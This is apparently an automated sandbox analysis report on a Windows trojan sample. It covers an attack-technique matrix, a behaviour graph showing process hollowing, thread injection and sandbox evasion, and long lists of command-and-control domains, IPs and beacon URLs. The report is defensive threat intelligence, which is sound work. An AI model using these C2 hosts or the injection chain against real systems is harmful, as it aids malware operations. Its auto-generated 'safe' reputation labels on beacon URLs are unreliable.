            Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection712Masquerading1Input Capture1Security Software Discovery331Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Virtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing23DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339314 Sample: JAAkR51fQY.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 41 www.latin-hotspot.com 2->41 43 www.herbmedia.net 2->43 51 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 10 other signatures 2->57 11 JAAkR51fQY.exe 6 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\Roaming\zLIpEDZOH.exe, PE32 11->35 dropped 37 C:\Users\user\AppData\Local\...\tmp8416.tmp, XML 11->37 dropped 39 C:\Users\user\AppData\...\JAAkR51fQY.exe.log, ASCII 11->39 dropped 61 Detected unpacking (changes PE section rights) 11->61 63 Detected unpacking (overwrites its own PE header) 11->63 65 Writes to foreign memory regions 11->65 67 Injects a PE file into a foreign processes 11->67 15 vbc.exe 11->15         started        18 vbc.exe 11->18         started        20 schtasks.exe 1 11->20         started        signatures6 process7 signatures8 75 Modifies the context of a thread in another process (thread injection) 15->75 77 Maps a DLL or memory area into another process 15->77 79 Sample uses process hollowing technique 15->79 81 Queues an APC in another process (thread injection) 15->81 22 explorer.exe 15->22 injected 83 Tries to detect virtualization through RDTSC time measurements 18->83 26 conhost.exe 20->26         started        process9 dnsIp10 45 thedigitalsatyam.com 216.10.246.131, 49754, 49777, 80 PUBLIC-DOMAIN-REGISTRYUS India 22->45 47 www.aldanasanchezmx.com 149.202.23.211, 49741, 49762, 80 OVHFR France 22->47 49 20 other IPs or domains 22->49 59 System process connects to network (likely due to code injection or exploit) 22->59 28 wlanext.exe 22->28         started        signatures11 process12 signatures13 69 Modifies the context of a thread in another process (thread injection) 28->69 71 Maps a DLL or memory area into another process 28->71 73 Tries to detect virtualization through RDTSC time measurements 28->73 31 cmd.exe 1 28->31         started        process14 process15 33 conhost.exe 31->33         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            JAAkR51fQY.exe31%VirustotalBrowse
            JAAkR51fQY.exe32%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            JAAkR51fQY.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\zLIpEDZOH.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\zLIpEDZOH.exe32%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.JAAkR51fQY.exe.6d0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
            4.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.masterzushop.comReferer:0%Avira URL Cloudsafe
            http://www.epicmassiveconcepts.com0%Avira URL Cloudsafe
            http://www.magenx2.infoReferer:0%Avira URL Cloudsafe
            http://www.globepublishers.com0%Avira URL Cloudsafe
            http://www.yyyut6.com/csv8/www.alparmuhendislik.com100%Avira URL Cloudphishing
            http://www.yyyut6.comReferer:0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/hostinger/banners/master/hostinger_welcome/images/hostinger-dragon0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp//e0%Avira URL Cloudsafe
            http://www.bhoomimart.com/csv8/www.yyyut6.com0%Avira URL Cloudsafe
            http://www.latin-hotspot.com/csv8/www.globepublishers.com0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.starrockindia.comReferer:0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.yyyut6.com100%Avira URL Cloudphishing
            http://www.jiyu-kobo.co.jp/.0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.thedigitalsatyam.com/csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf0%Avira URL Cloudsafe
            http://www.starrockindia.com/csv8/www.studentdividers.com0%Avira URL Cloudsafe
            http://www.studentdividers.com0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.epicmassiveconcepts.comReferer:0%Avira URL Cloudsafe
            http://www.starrockindia.com0%Avira URL Cloudsafe
            http://www.scheherazadelegault.com0%Avira URL Cloudsafe
            http://www.herbmedia.net/csv8/www.scheherazadelegault.com0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0%Avira URL Cloudsafe
            http://www.alparmuhendislik.com0%Avira URL Cloudsafe
            http://www.masterzushop.com0%Avira URL Cloudsafe
            http://www.studentdividers.comReferer:0%Avira URL Cloudsafe
            http://www.bhoomimart.com0%Avira URL Cloudsafe
            http://www.latin-hotspot.com/csv8/0%Avira URL Cloudsafe
            http://www.aldanasanchezmx.com/csv8/www.bhoomimart.com0%Avira URL Cloudsafe
            http://www.yyyut6.com/csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf100%Avira URL Cloudphishing
            http://www.thedigitalsatyam.com/csv8/0%Avira URL Cloudsafe
            http://www.scheherazadelegault.com/csv8/www.starrockindia.com0%Avira URL Cloudsafe
            http://www.latin-hotspot.com0%Avira URL Cloudsafe
            http://www.aldanasanchezmx.com0%Avira URL Cloudsafe
            http://www.masterzushop.com/csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf0%Avira URL Cloudsafe
            http://www.thedigitalsatyam.comReferer:0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.scheherazadelegault.com/csv8/0%Avira URL Cloudsafe
            http://www.ankitparivar.com0%Avira URL Cloudsafe
            http://www.scheherazadelegault.comReferer:0%Avira URL Cloudsafe
            http://www.aldanasanchezmx.comReferer:0%Avira URL Cloudsafe
            http://www.colliapse.comReferer:0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Y0onY0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/t0%URL Reputationsafe
            http://www.colliapse.com/csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf0%Avira URL Cloudsafe
            http://www.bhoomimart.comReferer:0%Avira URL Cloudsafe
            http://www.alparmuhendislik.com/csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf0%Avira URL Cloudsafe
            http://www.yyyut6.com/csv8/100%Avira URL Cloudphishing
            http://www.masterzushop.com/csv8/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/f0%Avira URL Cloudsafe
            http://www.globepublishers.com/csv8/www.thedigitalsatyam.com0%Avira URL Cloudsafe
            http://www.aldanasanchezmx.com/csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.magenx2.info/csv8/0%Avira URL Cloudsafe
            http://www.bhoomimart.com/csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp/K0%Avira URL Cloudsafe
            http://www.globepublishers.comReferer:0%Avira URL Cloudsafe
            http://www.masterzushop.com/csv8/www.aldanasanchezmx.com0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.bhoomimart.com/csv8/0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/-cz0%Avira URL Cloudsafe
            http://www.herbmedia.net0%Avira URL Cloudsafe
            http://www.herbmedia.net/csv8/0%Avira URL Cloudsafe
            http://www.herbmedia.netReferer:0%Avira URL Cloudsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.globepublishers.com/csv8/0%Avira URL Cloudsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.aldanasanchezmx.com
            149.202.23.211
            truetrue
              unknown
              studentdividers.com
              34.102.136.180
              truetrue
                unknown
                www.globepublishers.com
                45.88.202.115
                truetrue
                  unknown
                  epicmassiveconcepts.com
                  34.102.136.180
                  truetrue
                    unknown
                    www.alparmuhendislik.com
                    23.105.124.225
                    truetrue
                      unknown
                      pronetpower.xshoppy.shop
                      99.83.185.45
                      truetrue
                        unknown
                        www.masterzushop.com
                        104.21.13.175
                        truetrue
                          unknown
                          www.yyyut6.com
                          45.38.251.204
                          truetrue
                            unknown
                            thedigitalsatyam.com
                            216.10.246.131
                            truetrue
                              unknown
                              ext-sq.squarespace.com
                              198.185.159.144
                              truefalse
                                high
                                bhoomimart.com
                                2.57.90.16
                                truetrue
                                  unknown
                                  starrockindia.com
                                  103.20.127.61
                                  truetrue
                                    unknown
                                    www.herbmedia.net
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.bhoomimart.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.scheherazadelegault.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.starrockindia.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.studentdividers.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.thedigitalsatyam.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.ankitparivar.com
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.colliapse.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.latin-hotspot.com
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.epicmassiveconcepts.com
                                                      unknown
                                                      unknowntrue
                                                        unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.thedigitalsatyam.com/csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyftrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.yyyut6.com/csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyftrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://www.masterzushop.com/csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyftrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.colliapse.com/csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyftrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.alparmuhendislik.com/csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyftrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.aldanasanchezmx.com/csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyftrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.bhoomimart.com/csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyftrue
                                                        • Avira URL Cloud: safe
                                                        unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://www.masterzushop.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.epicmassiveconcepts.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.magenx2.infoReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.globepublishers.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.yyyut6.com/csv8/www.alparmuhendislik.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        http://www.yyyut6.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://raw.githubusercontent.com/hostinger/banners/master/hostinger_welcome/images/hostinger-dragonwlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp//eJAAkR51fQY.exe, 00000000.00000003.206667781.0000000007E43000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.bhoomimart.com/csv8/www.yyyut6.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.latin-hotspot.com/csv8/www.globepublishers.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sajatypeworks.comJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.starrockindia.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cn/cTheJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.yyyut6.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/.JAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleaseJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.starrockindia.com/csv8/www.studentdividers.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.studentdividers.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.urwpp.deDPleaseJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cnJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameJAAkR51fQY.exe, 00000000.00000002.228844270.0000000002BF2000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.epicmassiveconcepts.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.starrockindia.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.scheherazadelegault.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.herbmedia.net/csv8/www.scheherazadelegault.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/YJAAkR51fQY.exe, 00000000.00000003.207211285.0000000007E49000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.alparmuhendislik.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.masterzushop.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.studentdividers.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.bhoomimart.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.latin-hotspot.com/csv8/explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.aldanasanchezmx.com/csv8/www.bhoomimart.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.thedigitalsatyam.com/csv8/explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.scheherazadelegault.com/csv8/www.starrockindia.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.latin-hotspot.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.aldanasanchezmx.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.thedigitalsatyam.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.carterandcone.comlJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.scheherazadelegault.com/csv8/explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.ankitparivar.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.scheherazadelegault.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.aldanasanchezmx.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.colliapse.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/sJAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/Y0onYJAAkR51fQY.exe, 00000000.00000003.207061983.0000000007E47000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/tJAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.bhoomimart.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.yyyut6.com/csv8/explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmptrue
                                                              • Avira URL Cloud: phishing
                                                              unknown
                                                              http://www.masterzushop.com/csv8/explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.jiyu-kobo.co.jp/fJAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.globepublishers.com/csv8/www.thedigitalsatyam.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.com/designersGJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.fontbureau.com/designers/?JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/bTheJAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.magenx2.info/csv8/explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers?JAAkR51fQY.exe, 00000000.00000002.238883783.00000000090D2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/jp/KJAAkR51fQY.exe, 00000000.00000003.207420358.0000000007E4B000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.globepublishers.comReferer:explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.masterzushop.com/csv8/www.aldanasanchezmx.comexplorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.tiro.comexplorer.exe, 00000005.00000000.253741249.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.hostinger.com/affiliate-programwlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://www.bhoomimart.com/csv8/explorer.exe, 00000005.00000003.549981020.00000000089D8000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
